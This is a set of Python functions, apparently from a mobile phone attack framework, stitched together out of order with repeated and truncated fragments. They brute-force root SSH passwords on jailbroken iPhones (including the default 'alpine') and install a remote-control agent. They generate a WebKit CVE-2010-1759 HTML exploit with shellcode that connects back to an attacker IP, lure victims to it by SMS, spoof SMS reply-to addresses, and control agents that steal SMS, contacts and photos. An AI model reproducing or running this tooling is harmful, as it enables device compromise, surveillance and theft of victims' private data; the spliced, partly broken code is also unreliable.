def guess_pass(passfile='', default=False, agent_location='./'): # Init Default Vars ipaddress = raw_input(color(33, '[*] IP address: ')) vulnerable = 'no' agent = 'no' command = 'sftp root@%s' % ipaddress timeout = 10 notfound = 'ssh: connect to host %s port 22: Connection refused' % ipaddress passwordstring = "root@%s's password: " % ipaddress putfile = agent_location agentfile = putfile.split('/')[-1] connectstring = 'Connecting to %s...' % ipaddress installcommand = 'dpkg -i %s' % agentfile guesspassword = '' passlist = ['alpine'] # Read passwords from file if not using default password if default == False: passfile = raw_input(color(33, '[*] Password File Location: ')) file = open(passfile, 'r') passlist = file.readlines() for guess in passlist: # Try to spawn an sftp session try: exp = pexpect.spawn(command) except Exception, e: print color(31, '[!] Cannot spawn sftp command: %s' % e) return 1 try: exp.expect(connectstring, timeout) exp.expect('Are you sure you want to continue connecting (yes/no)?', timeout) exp.sendline('yes') exp.expect(passwordstring,timeout) exp.sendline(guess) # If the sftp works, we know that the password was correct try: exp.expect('sftp>', timeout) vulnerable = 'yes' break except Exception, e: vulnerable = 'no' pass except Exception, e: # print '[!] Exception: %s' % e if str(e).__contains__('Connection refused') == True: print color(31, '[!] Exception: Connection Refused') if default == False: return 1 else: print color(31, '[!] Exception: %s' % e)
def spf_db(): '''Wrapper for MySQLdb.connect, rereads SQL config vars in case they change.''' config = ConfigParser.ConfigParser() config.read('config.cfg') # SQL config vars sqlserver = config.get('SQL','server') username = config.get('SQL','username') password = config.get('SQL','password') try: db = MySQLdb.connect(sqlserver, username, password, 'framework') except Exception, e: print color(31,'[!] Error connecting to database: %s' % e) db = None
def sshguess(): print 'This module attempts to guess the password for an Jailbroken iPhone on the local network by reading from a supplied password list\n' phoneipaddress = raw_input(color(33, '[+] IP address: ')) passfile = raw_input(color(33, '[+] Password file: ')) print color(33, '\n[*] IP Address: %s' % phoneipaddress) print color(33, '[*] Password file: %s' % passfile) correct = raw_input(color(31, '[+] Is this correct?(') + color(32, 'y') + color(31, '/') + color(32, 'N') + color(31, '): ')) if correct.lower().split('')[0] == 'y': e = guess_pass(phoneipaddress, passfile) return e return 1
def agentcontrol_menu(key=None): if key == None: key = raw_input(color(33, '\n[-] Enter agent control key [None]: ')) try: key = key.lower() except: pass if key in ('', 'none', '\n', None): key = None if key == None: print color(31, '[!] No key was provided, communicating with an agent will not work') print color(31, '[!] Returning...') return 1 menu_list = ['Send SMS' , 'Take Picture' , 'Get Contacts' , 'Get SMS Database' , 'Privilege Escalation' ] choice = menu(menu_list, color(35, '\n[*] Agent Control Commands:\n')) if choice is 0: return_code = 0 elif choice is 1: return_code = send_sms(key) elif choice is 2: return_code = take_picture(key) elif choice is 3: return_code = get_contacts(key) elif choice is 4: return_code = get_sms_database(key) elif choice is 5: return_code = privilege_escalation(key) # elif choice is my_number: # return_code = custom_module() # etc... else: return_code = 1 return return_code
def database_clear(): # Clears the MySQL DB ver = str(raw_input(str(color(31,"[!] This will destroy all your data! Are you sure you want to continue? (") + color(32,'y') + color(31, '/') + color(32,'N') + color(31,') ')))) return_code = 0 if ver == '': ver = 'n' if ver.lower()[0] != 'y': print color(31,'[!] Operation Cancelled') return_code = 0 return return_code db = spf_db() droplist = [] for item in ['agents', 'data', 'modems', 'remote', 'client']: command = 'DROP TABLE IF EXISTS %s' % item droplist.append(command) createquery1 =("create table agents ("+ "id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,"+ "number varchar(12),"+ "path varchar(1000),"+ "controlkey varchar(7),"+ "controlnumber varchar(12),"+ "platform varchar(12))") createquery2 =("create table data ("+ "id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,"+ "sms varchar(2000),"+ "contacts varchar(1000),"+ "picture varchar(100),"+ "root varchar(5))") createquery3 =("create table modems ("+ "id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,"+ "number varchar(12),"+ "path varchar(1000),"+ "controlkey varchar(7),"+ "type varchar(3))") createquery4 =("create table remote ("+ "id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,"+ "ip varchar(15),"+ "exploit varchar(200),"+ "vuln varchar(3),"+ "agent varchar(3))") createquery5 =("create table client ("+ "id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,"+ "number varchar(12),"+ "exploit varchar(200),"+ "vuln varchar(3))") if db == None: print str(color(31,"[!] Database doesn't exist.") + color(32,"Creating it\n")) #makecommand = 'mysqladmin -u %s create framework -p %s' % (username, password) try: # system(makecommand) # db = MySQLdb.connect(sqlserver, username, password, "framework") return_code = 1 return return_code except Exception, e: print color(31,'[!] Error creating DB: %s' % e) return_code = 1 # Return here to prevent database commands from trying to execute return return_code
return return_code cursor = db.cursor() createlist = [createquery1, createquery2, createquery3, createquery4, createquery5] try: for item in droplist: cursor.execute(item) db.commit() for item in createlist: cursor.execute(item) db.commit() except Exception, e: print color(31,'[!] Error executing clear and build commands: %s' % e) return_code = 1 return return_code def database_add2(number, path, key, x): # Adds to a DB, need to figure out where this is used and clean it up db = spf_db() number = '"%s"' % str(number) path = '"%s"' % str(path) key = '"%s"' % str(key) x = '"%s"' % str(x) insertquery = 'INSERT INTO modems (id,number,path,controlkey,type) VALUES (DEFAULT,%s,%s,%s,%s)' % (number, path, key, x)
def client_side(): # TODO: fix a lot webserver = config.get("Web", "server") # ipaddress = config.get('Web', 'ipaddress') shellipaddress = config.get("Web", "shellipaddress") cs = ["CVE 2010-1759 Webkit Vuln Android"] choice = menu(cs) if choice in (0, "Error"): return 0 elif choice == 1: path = str(raw_input(color(33, "[-] Hosting Path: "))) filename = str(raw_input(color(33, "[-] Filename: "))) ipaddress = str(raw_input(color(33, "[-] Local IP address: "))) number = str(raw_input(color(33, "[-] Phone Number to Attack: "))) link = "http://%s%s%s" % (ipaddress, path, filename) fullpath = webserver + path command1 = "mkdir %s" % fullpath system(command1) octets = shellipaddress.split(".") out1 = struct.pack("b", int(octets[0])) hex1 = hex(out1) out2 = struct.pack("b", int(octets[1])) hex2 = hex(out2) out3 = struct.pack("b", int(octets[2])) hex3 = hex(out3) out4 = struct.pack("b", int(octets[3])) hex4 = hex(out4) sploitfile = "%s%s" % (fullpath, filename) command8 = "touch %s" % sploitfile system(command8) command9 = "chmod 777 %s" % sploitfile system(command9) file = open(sploitfile, "w") text = [ "<html>\n", "<head>\n", "<script>\n", 'var ip = unescape("\\u' + hex2 + hex1 + "\\u" + hex4 + hex3 + '");\n', 'var port = unescape("\\u3930");\n', "function trigger()\n", "{\n", 'var span = document.createElement("div");\n', 'document.getElementById("BodyID").appendChild(span);\n', 'span.innerHTML = -parseFloat("NAN(ffffe00572c60)");\n', "}\n", "function exploit()\n", "{\n", 'var nop = unescape("\\u33bc\\u0057");\n', "do\n", "{\n", "nop+=nop;\n", "} while (nop.length<=0x1000);\n", 'var scode = nop+unescape("\\u1001\\ue1a0\\u0002\\ue3a0\\u1001\\ue3a0\\u2005\\ue281\\u708c\\ue3a0\\u708d\\ue287\\u0080\\uef00\\u6000\\ue1a0\\u1084\\ue28f\\u2010\\ue3a0\\u708d\\ue3a0\\u708e\\ue287\\u0080\\uef00\\u0006\\ue1a0\\u1000\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1001\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1002\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u2001\\ue28f\\uff12\\ue12f\\u4040\\u2717\\udf80\\ua005\\ua508\\u4076\\u602e\\u1b6d\\ub420\\ub401\\u4669\\u4052\\u270b\\udf80\\u2f2f\\u732f\\u7379\\u6574\\u2f6d\\u6962\\u2f6e\\u6873\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u0002");\n', "scode += port;\n", "scode += ip;\n", 'scode += unescape("\\u2000\\u2000");\n', "target = new Array();\n", "for(i = 0; i < 0x1000; i++)\n", "target[i] = scode;\n", "for (i = 0; i <= 0x1000; i++)\n", "{\n", 'document.write(target[i]+"<i>");\n', "if (i>0x999)\n", "{\n", "trigger();\n", "}\n", "}\n", "}\n", "</script>\n", "</head>\n", '<body id="BodyID">\n', "Enjoy!\n", "<script>\n", "exploit();\n", "</script>\n", "</body>\n", "</html>\n", ] file.writelines(text) file.close() modem = get_modem() if modem == 0: print color(31, "\n[!] No modems found. Attach a modem to use this functionality\n") return 1 # Read SQL vars from config sqlserver = config.get("SQL", "server") username = config.get("SQL", "username") password = config.get("SQL", "password") db = MySQLdb.connect(sqlserver, username, password, "framework") pathquery = "SELECT %s from modems where id=%s" % ("path", modem) path2 = db_exec_rows(pathquery) keyquery = "SELECT %s from modems where id=%s" % ("controlkey", modem) key2 = db_exec_rows(keyquery) modemtypequery = "SELECT %s from modems where id=%s" % ("type", modem) modemtype2 = db_exec_rows(modemtypequery) if modemtype2 == "usb": # Interface with USB modem usb = serial.serialposix(port="/dev/ttyUSB2", baudrate=115200, bytesize=8, parity="N", stopbits=1) usb.write("ATZ\r\n") sleep(1) line = read_modem(usb) print line sleep(1) usb.write("AT+CMGF=1\r\n") line = read_modem(usb) print line sleep(1) numberline = 'AT+CMGS="%s"\r\n' % number usb.write(numberline) line = read_modem(usb) print line sleep(1) msg = "This is a cool page: %s" % link usb.write(struct.pack("b", 26, msg)) sleep(2) line = read_modem(usb) print line sleep(1) usb.close() elif modemtype2 == "app": # Interface with app-based modem control = "%s%s/getfunc" % (webserver, path2) command2 = "%s SEND %s This is a cool page: %s" % (key2, number, link) file = open(control, "w") file.write(command2) file.close() vulnerable = "no" # socket = new IO::Socket::INET (LocalHost => $shellipaddress, LocalPort => '12345', Proto => 'tcp' , Listen => 1, Reuse => 1, Timeout=> 180); s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((str(shellipaddress), 12345)) if data_socket == socket.accept(): data = "/system/bin/id\n" data_socket.write(data) data = data_socket() print data close(data_socket) vulnerable = "yes" print color(32, "\n[+] Vulnerable: %s\n" % vulnerable) table = "client" global db number2 = '"%s"' % number vulnerable2 = '"%s"' % vulnerable webkit = '"webkit"' insertquery = "INSERT INTO %s (id,number,exploit,vuln) VALUES (DEFAULT,%s,%s,%s)" % ( table, number2, webkit, vulnerable2, ) cursor = db.cursor() sql = cursor.execute(insertquery) return 0 return 1
except Exception, e: vulnerable = 'no' pass except Exception, e: # print '[!] Exception: %s' % e if str(e).__contains__('Connection refused') == True: print color(31, '[!] Exception: Connection Refused') if default == False: return 1 else: print color(31, '[!] Exception: %s' % e) # Upload agent if vulnerable if vulnerable == 'yes': print color(32, '[+] PASSWORD FOUND: %s\n' % guess) guesspassword = guess exp.sendline('put %s' % putfile) exp.expect('sftp>', timeout) exp.sendline('bye') command2 = 'ssh' exp = pxpect.spawn(command2+param) exp.expect(passwordstring, timeout) exp.sendline(guess) exp.expect(['root']) exp.sendline(installcommand) exp.expect('Setting up com.bulbsecurity.tooltest (0.0.1-23) ...', timeout) exp.sendline('tooltest') try:
def sms_sender_spoof(): print color( 33, "[*] This module allows you to spoof the Reply-to address on an SMS using the User Data Header (UDH).\n" + "[ ] This attack only works against iPhones.\n" + "[ ] Currently this attack requires a USB mobile modem and does not work with the SPF app.\n", ) print color(35, "[*] Select a USB modem to use for the attack:\n") modem = get_usb_modem() if modem is 0: print color(31, "\nNo USB modems found. Attach a USB modem to use this functionality\n") else: print color( 31, "[!] This functionality isn't perfect yet. " + "There is something is wrong with the fill bits on the UDH if it does not meet on a septet boundary.\n" + "[ ] The message will be mangled. To get it to work use a 4 digit spoofed number ie 1234 or 9999.\n", ) numberattack = raw_input(color(33, "[+] Number to Attack: ")) message = raw_input(color(33, "[+] Message: ")) spoof = raw_input(color(33, "[+] Spoofed Reply-To Address: ")) print color(33, "\n[*] Number to Attack: ") + color(31, "%s" % numberattack) print color(33, "[*] Message: ") + color(31, "%s" % message) print color(33, "[*] Spoofed Reply-To Address: ") + color(31, "%s" % spoof) correct = raw_input( color(35, "\n[*] Is this correct?(") + color(32, "y") + color(35, "/") + color(32, "N") + color(35, "): ") ) if correct[0].lower() is "y": pdu = "004100" ef = 0 length = len(numberattack) # print $len; if length % 2 is not 0: ef = 1 attacklenhex = "%02x" % length # print attacklenhex pdu += attacklenhex scrambledattack = "" i = 0 x = numberattack while i < (length - 2): sub = x[i + 1] scrambledattack += sub sub = x[i] scrambledattack += sub i += 2 if ef is 1: scrambledattack += "F" sub = x[length - 1] scrambledattack += sub else: sub = x[i + 1] scrambledattack += sub sub = x[i] scrambledattack += sub # print scrambledattack pdu = "%s91%s0000" % (pdu, scrambledattack) eff = 0 length = len(spoof) # print "Length: %s\n" % length if length % 2 != 0: eff = 1 spooflenhex = "%02x" % length # print "Spoof hex length: %s\n" % spooflenhex scrambledspoof = "" i = 0 x = spoof while i < length - 2: sub = x[i + 1] scrambledspoof += sub sub = x[i] scrambledspoof += sub i += 2 if eff is 1: scrambledspoof += "F" sub = x[length - 1] scrambledspoof += sub else: sub = x[i + 1] scrambledspoof += sub sub = x[i] scrambledspoof += sub # print $scrambledspoof uhd = "%s91%s" % (spooflenhex, scrambledspoof) # print "UHD1: "+$uhd+"\n" udhlen1 = len(uhd) / 2 # print "length1 "+$udhlen1+"\n" uhd = "220%s%s" % (udhlen1, uhd) # print "UHD2 "+$uhd+"\n" udhlen2 = len(uhd) / 2 more = ((udhlen2 + 1) * 8) % 7 # print "More: "+$more if more is not 0: more2 = "0" * (7 - more) # print "More2: "+$more2 else: more2 = "" # print "length2 "+$udhlen2+"\n" uhdlenhex = "%02x" % udhlen2 uhd = uhdlenhex + uhd # print "UHD:"+$uhd+"\n"; bin = "" length = len(message) bits = struct.unpack("B", int(message, 2))[0] bits = more2 + bits # print "BITS: "+bits+"\n" bitslength = len(bits) / 2 octetlength = bitslength / 8 # print "\n"+$octetlength+"\n" septets = "" i = 0 while i < octetlength: start = i * 8 octs = str(bits).split("")[start : start + 8] sept = octs.split("")[1 : 1 + 7] septets += sept # print "\nSeptets: %s\n" % septets septetlength = len(septets) / 7 # print "\nSeptet Length: %s\n" % str(septetlength) eat = 1 eaten = 0 ud = "" j = 0 while j < (septetlength - 1): start = j * 7 # print "\nEaten: %s\n" % eaten first = str(septets).split("")[start : start + (7 - eaten)] # print "\nFirst: %s\n" % first start2 = (j + 1) * 7 second = str(septets).split("")[start2 : start2 + 7] food = 7 - eat stolen = second.split("")[food : food + eat] encode = stolen + first # print "\nEncode: %s\n" % encode hexy = struct.unpack("H", struct.pack("B", int(encode, 2))) eat += 1 eat = eat % 8 eaten += 1 eaten = eaten % 8 # print "\nHexy: %s\n" % hexy ud += hexy j += 1 first = septets.split("")[((septetlength - 1) * 7) : ((septetlength - 1) * 7) + (7 - eaten)] # print "\nFirst: %s\n" % first fill = 1 + eaten zeros = "0" * fill encode = zeros + first # print "\nEncode: %s\n" % encode hexy = struct.unpack("H", struct.pack("B", int(encode, 2))) ud += hexy # print "\nUD: %s\n" % ud ud = uhd + ud udlength = len(ud) udlength2 = udlength / 2 extra = int(udlength2 / 7) udlength3 = udlength2 + extra udlenhex = "%02x" % udlength3 pdu += udlenhex + ud # print "\nPDU: %s\n" % pdu pdulen = (len(pdu) / 2) - 1 # print "\nPDULENGTH: %s\n" % pdulen usb = serial.serialposix(port="/dev/ttyUSB2", baudrate=115200, bytesize=8, parity="N", stopbits=1) usb.write("ATZ\r\n") sleep(1) line = read_modem(usb) print line sleep(1) usb.write("AT+CMGF=0\r\n") line = read_modem(usb) print line sleep(1) usb.write("AT+CMGS=%s\r\n" % pdulen) # usb.write("AT+CMGS=27\r\n") line = read_modem(usb) print line sleep(1) msg = pdu # msg = "0041000B916110831316F900000F0A22080B915117344588F142A701" usb.write(msg.pack("b", 26)) sleep(10) line = read_modem(usb) print line usb.close() i += 1 return 0
def alpine(): print color(33,'[*] Executing the "Guess Password" module with default password') a = guess_pass(default=True) return a
def direct_download(): #TODO: cleanup webserver = config.get('Web', 'server') ipaddress = config.get('Web', 'ipaddress') print color(35, '[*] This module sends an SMS with a link to directly download and install an Agent\n') print color(31, '[!] ONLY Android currently Supported') #platform = str(raw_input('Platform(Android/iPhone/Blackberry): ')) platform = 'android' # Lots of potential for error with the way this is handled, would # prefer safer execution path = str(raw_input(color(33, '[-] Hosting Path: ' ))) filename = str(raw_input(color(33, '[-] Filename: ' ))) number = str(raw_input(color(33, '[-] Phone Number to Attack: '))) if platform.lower() == 'android': link = 'http://%s%s%s' % (ipaddress, path, filename) fullpath = '%s%s' % (webserver, path) command1 = 'mkdir %s' % fullpath system(command1) global location # Android agent location command = 'cp %s %s%s%s'% (location, webserver, path, filename) system(command) modem = get_modem() if modem == 0: print color(31, '\n[!] No modems found. Attach a modem to use this functionality\n') return 0 else: pathquery = "SELECT %s from modems where id=%s" % ('path', modem) path2 = db_exec_rows(pathquery) keyquery = "SELECT %s from modems where id=%s" % ('controlkey', modem) key2 = db_exec_rows(keyquery) modemtypequery = "SELECT %s from modems where id=%s" % ('type', modem) modemtype2 = db_exec_rows(modemtypequery) if modemtype2 == 'usb': usb = serial.serialposix(port='/dev/ttyUSB2', baudrate=115200, bytesize=8, parity='N', stopbits=1) usb.write('ATZ\r\n') sleep(1) line = read_modem(usb) print line sleep(1) usb.write('AT+CMGF=1\r\n') line = read_modem(usb) print line sleep(1) numberline = 'AT+CMGS="%s"\r\n' % number usb.write(numberline) line = read_modem(usb) print line sleep(1) msg = 'This is a cool app: %s' % link usb.write(struct.pack('b', 26, msg)) sleep(5) line = read_modem(usb) print line sleep(1) usb.close() elif modemtype2 == 'app': control = '%s%s/getfunc' % (webserver, path2) command2 = '%s SEND %s This is a cool app: %s' % (key2, number, link) file = open(control, 'w') file.write(command2) file.close() return 0